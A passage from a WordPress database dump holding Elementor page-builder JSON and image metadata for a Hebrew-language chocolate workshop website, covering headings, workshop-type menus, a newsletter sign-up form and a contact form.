\\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"22e902c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"79642803\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31be803d\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"68a336e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5bb3e53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b2bedda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"71a725e0\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(433,100,'_elementor_version','2.9.8'),(434,104,'_wp_attached_file','2018/05/groups-choco.jpg'),(435,104,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:630;s:4:\"file\";s:24:\"2018/05/groups-choco.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"groups-choco-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"groups-choco-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"groups-choco-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"groups-choco-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:24:\"groups-choco-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(436,105,'_wp_page_template','elementor_canvas'),(437,105,'_elementor_edit_mode','builder'),(438,105,'_elementor_data','[{\"id\":\"5841dc66\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"4504fb06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"b815b78\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"76b85204\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"4855771b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"23c8927c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f5a1a2b\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7dc8b868\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"679b4d51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"79e92b2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"1755930a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f43216a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"22e902c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"79642803\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd 